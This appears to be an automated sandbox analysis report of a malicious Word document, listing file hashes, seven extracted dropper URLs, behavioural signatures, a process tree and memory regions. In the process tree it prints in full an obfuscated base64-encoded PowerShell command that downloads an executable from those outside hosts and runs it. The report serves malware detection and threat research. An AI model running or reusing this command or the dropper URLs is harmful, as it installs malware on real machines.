Analysis

  • max time kernel
    121s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    30/04/2024, 11:55

General

  • Target

    09ba0e396581e22c7048e07e2cdc75c4_JaffaCakes118.doc

  • Size

    214KB

  • MD5

    09ba0e396581e22c7048e07e2cdc75c4

  • SHA1

    8538c50d55cbed7baec80e3d8cfc21b529a6e910

  • SHA256

    9475e60869aab3e8d45e76c6b7d705be58862a2b374b27e783db46923b8f17eb

  • SHA512

    f4bfc81d0ecee92814f14d68ae46788899f13b2138697964f60cb40fb487b645ab8bb89507065568790636c1aa74e096ac8d2f15d6e8204b13c70b7247385298

  • SSDEEP

    1536:2B445TEgrO3jSWAg83tle1ZZ0293QM0eetR2cOupLB5UZ55+a9okLShGkVAelnXY:222TWTogk079THcpOu5UZLWhGMlnIj

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://dongyabingfu.com/wp-includes/w/

exe.dropper

http://givingthanksdaily.com/Q/

exe.dropper

http://uniteddatabase.net/wp-admin/dhJ/

exe.dropper

http://www.gozowindmill.com/meteo/nmy/

exe.dropper

http://kcdryervents.com/ca/D/

exe.dropper

http://www.greaudstudio.com/docs/kGQ/

exe.dropper

https://mrveggy.com/erros/3Ss/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\09ba0e396581e22c7048e07e2cdc75c4_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2984
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1956
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -en JABYADMAZAB4AGIAaQBnAD0AKAAoACcARgAwACcAKwAnADIAJwApACsAKAAnAG8AMAAnACsAJwAyAGEAJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABFAE4AdgA6AFUAcwBFAHIAcABSAE8AZgBpAEwARQBcAE8ANAA0AHYAawA0AHcAXAB1AGwASgAyAEgAQgAxAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAEQAaQByAEUAYwB0AG8AUgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAARQBDAHUAUgBgAEkAYABUAHkAUABSAE8AdABvAGAAQwBvAGwAIgAgAD0AIAAoACgAJwB0ACcAKwAnAGwAcwAnACkAKwAoACcAMQAnACsAJwAyACwAIAAnACkAKwAoACcAdAAnACsAJwBsAHMAMQAxACwAJwApACsAKAAnACAAdABsACcAKwAnAHMAJwApACkAOwAkAEsAaAB4AHgAZwBjAHMAIAA9ACAAKAAnAEkAJwArACgAJwB5ADQANAAnACsAJwBqACcAKQArACcANwAnACkAOwAkAFYAcQBxAHoAdgBhAHgAPQAoACcASgByACcAKwAoACcAdgAnACsAJwAxAHAAXwAnACkAKwAnADcAJwApADsAJABRAGMAbgByADcAawBuAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAE8AdQAnACsAKAAnAHcAJwArACcATwA0ADQAdgBrADQAJwApACsAJwB3ACcAKwAnAE8AdQAnACsAKAAnAHcAJwArACcAVQBsAGoAMgBoAGIAMQAnACsAJwBPACcAKwAnAHUAJwApACsAJwB3ACcAKQAgAC0AQwByAGUAcABsAGEAQwBFACAAKAAnAE8AJwArACcAdQB3ACcAKQAsAFsAYwBIAEEAcgBdADkAMgApACsAJABLAGgAeAB4AGcAYwBzACsAKAAnAC4AJwArACgAJwBlACcAKwAnAHgAZQAnACkAKQA7ACQASQB3AHkAbwBtAGMAaQA9ACgAJwBBAGsAJwArACcAZgAnACsAKAAnAHAAJwArACcAdABqADkAJwApACkAOwAkAEMAbgB3ADIAegBvAHoAPQAmACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AdwBFAEIAQwBsAEkARQBuAFQAOwAkAEsAdgB1AGYAdwB2AG4APQAoACgAJwBoACcAKwAnAHQAdAAnACsAJwBwADoALwAvAGQAJwApACsAJwBvACcAKwAoACcAbgBnAHkAYQAnACsAJwBiACcAKQArACgAJwBpAG4AZwBmACcAKwAnAHUAJwApACsAKAAnAC4AYwBvAG0ALwB3ACcAKwAnAHAAJwArACcALQBpAG4AYwBsACcAKwAnAHUAJwApACsAJwBkACcAKwAoACcAZQBzAC8AJwArACcAdwAnACkAKwAoACcALwAqAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AZwAnACsAJwBpAHYAJwApACsAKAAnAGkAbgBnAHQAaAAnACsAJwBhACcAKQArACcAbgAnACsAKAAnAGsAJwArACcAcwBkAGEAaQBsAHkAJwArACcALgBjACcAKQArACcAbwBtACcAKwAoACcALwBRAC8AKgAnACsAJwBoACcAKQArACcAdAAnACsAKAAnAHQAcAA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAdQAnACsAJwBuAGkAJwApACsAKAAnAHQAZQBkACcAKwAnAGQAJwApACsAKAAnAGEAdAAnACsAJwBhACcAKQArACcAYgAnACsAKAAnAGEAcwAnACsAJwBlACcAKQArACgAJwAuACcAKwAnAG4AZQAnACkAKwAnAHQAJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAtAGEAZABtAGkAbgAvAGQAJwApACsAKAAnAGgAJwArACcASgAvACoAJwApACsAJwBoAHQAJwArACgAJwB0AHAAJwArACcAOgAvAC8AdwAnACkAKwAnAHcAdwAnACsAKAAnAC4AZwAnACsAJwBvAHoAJwArACcAbwB3AGkAbgAnACkAKwAnAGQAJwArACgAJwBtACcAKwAnAGkAbAAnACkAKwAnAGwAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAbQAnACkAKwAnAGUAJwArACgAJwB0AGUAbwAnACsAJwAvAG4AJwApACsAKAAnAG0AeQAvACoAaAB0ACcAKwAnAHQAJwApACsAJwBwACcAKwAnADoALwAnACsAKAAnAC8AawBjACcAKwAnAGQAJwApACsAJwByAHkAJwArACcAZQByACcAKwAoACcAdgBlAG4AJwArACcAdAAnACkAKwAoACcAcwAnACsAJwAuAGMAbwBtAC8AYwBhACcAKQArACcALwAnACsAJwBEAC8AJwArACgAJwAqAGgAdAAnACsAJwB0ACcAKQArACgAJwBwACcAKwAnADoALwAvAHcAJwApACsAKAAnAHcAdwAnACsAJwAuACcAKQArACgAJwBnAHIAZQAnACsAJwBhAHUAZAAnACkAKwAnAHMAdAAnACsAJwB1ACcAKwAnAGQAJwArACgAJwBpAG8ALgAnACsAJwBjACcAKQArACcAbwBtACcAKwAoACcALwAnACsAJwBkAG8AYwAnACkAKwAnAHMALwAnACsAJwBrACcAKwAnAEcAUQAnACsAKAAnAC8AKgAnACsAJwBoAHQAJwApACsAKAAnAHQAJwArACcAcABzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAnAG0AJwArACgAJwByAHYAZQAnACsAJwBnACcAKwAnAGcAeQAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvAGUAcgByACcAKwAnAG8AJwArACcAcwAvADMAUwAnACkAKwAnAHMALwAnACkALgAiAFMAUABgAGwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAQQBoAGoAZwB3AHQAdwA9ACgAKAAnAE8AJwArACcAdQBvADgAJwApACsAKAAnAG8AYQAnACsAJwB3ACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQARQA1AGoAbgB3AGIAcQAgAGkAbgAgACQASwB2AHUAZgB3AHYAbgApAHsAdAByAHkAewAkAEMAbgB3ADIAegBvAHoALgAiAEQAYABvAFcAbgBMAGAAbwBBAGAAZABGAGkATABFACIAKAAkAEUANQBqAG4AdwBiAHEALAAgACQAUQBjAG4AcgA3AGsAbgApADsAJABMAGUAcQBoAHcAcgBoAD0AKAAnAEYAcgAnACsAKAAnAHkAawAnACsAJwA2ACcAKQArACcAaAA2ACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGMAbgByADcAawBuACkALgAiAGwAYABlAG4AZwB0AGgAIgAgAC0AZwBlACAAMgAyADEAMgAzACkAIAB7ACYAKAAnAEkAJwArACcAbgB2AG8AawBlACcAKwAnAC0ASQAnACsAJwB0AGUAbQAnACkAKAAkAFEAYwBuAHIANwBrAG4AKQA7ACQAVQB6AGgAMQB6ADAANQA9ACgAJwBOACcAKwAoACcANQA0ACcAKwAnAHoAbAB2AGEAJwApACkAOwBiAHIAZQBhAGsAOwAkAEEAMABwADQAMgBnAHUAPQAoACcATQAwACcAKwAoACcAZQAnACsAJwA2AG0AagBtACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABIAG4AdgBtAG8AcAAzAD0AKAAoACcAUQBoAGMAJwArACcAeQBwACcAKQArACcAZAAnACsAJwA5ACcAKQA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1204

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      612d8ec183f95f9a26a5e4bc8a3d4d3c

      SHA1

      f58629b389d4340174a61fcd777b5f9fc05f98ba

      SHA256

      313823c6ebe3e8c0f991767cde74de258099d531151f81bd825e3e92aeeae057

      SHA512

      25e6025df3e3f347b1f7834acdaf647d6bdfe6b478203e4f949a4062441029f4e89a91599eb78491854e4eac069a3bb4a323982e7a6191c5aaa8104565395ef8

    • memory/1204-40-0x000000001B420000-0x000000001B702000-memory.dmp

      Filesize

      2.9MB

    • memory/1204-41-0x0000000002790000-0x0000000002798000-memory.dmp

      Filesize

      32KB

    • memory/2984-14-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-28-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-8-0x0000000005BF0000-0x0000000005CF0000-memory.dmp

      Filesize

      1024KB

    • memory/2984-10-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-13-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-12-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-11-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-9-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-22-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-23-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-20-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-18-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-19-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-17-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-15-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-0-0x000000002FE21000-0x000000002FE22000-memory.dmp

      Filesize

      4KB

    • memory/2984-7-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-27-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-26-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-24-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-25-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-29-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-30-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-33-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-32-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-31-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-34-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-6-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-2-0x000000007141D000-0x0000000071428000-memory.dmp

      Filesize

      44KB

    • memory/2984-49-0x000000007141D000-0x0000000071428000-memory.dmp

      Filesize

      44KB

    • memory/2984-50-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-52-0x0000000000800000-0x0000000000900000-memory.dmp

      Filesize

      1024KB

    • memory/2984-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2984-68-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2984-69-0x000000007141D000-0x0000000071428000-memory.dmp

      Filesize

      44KB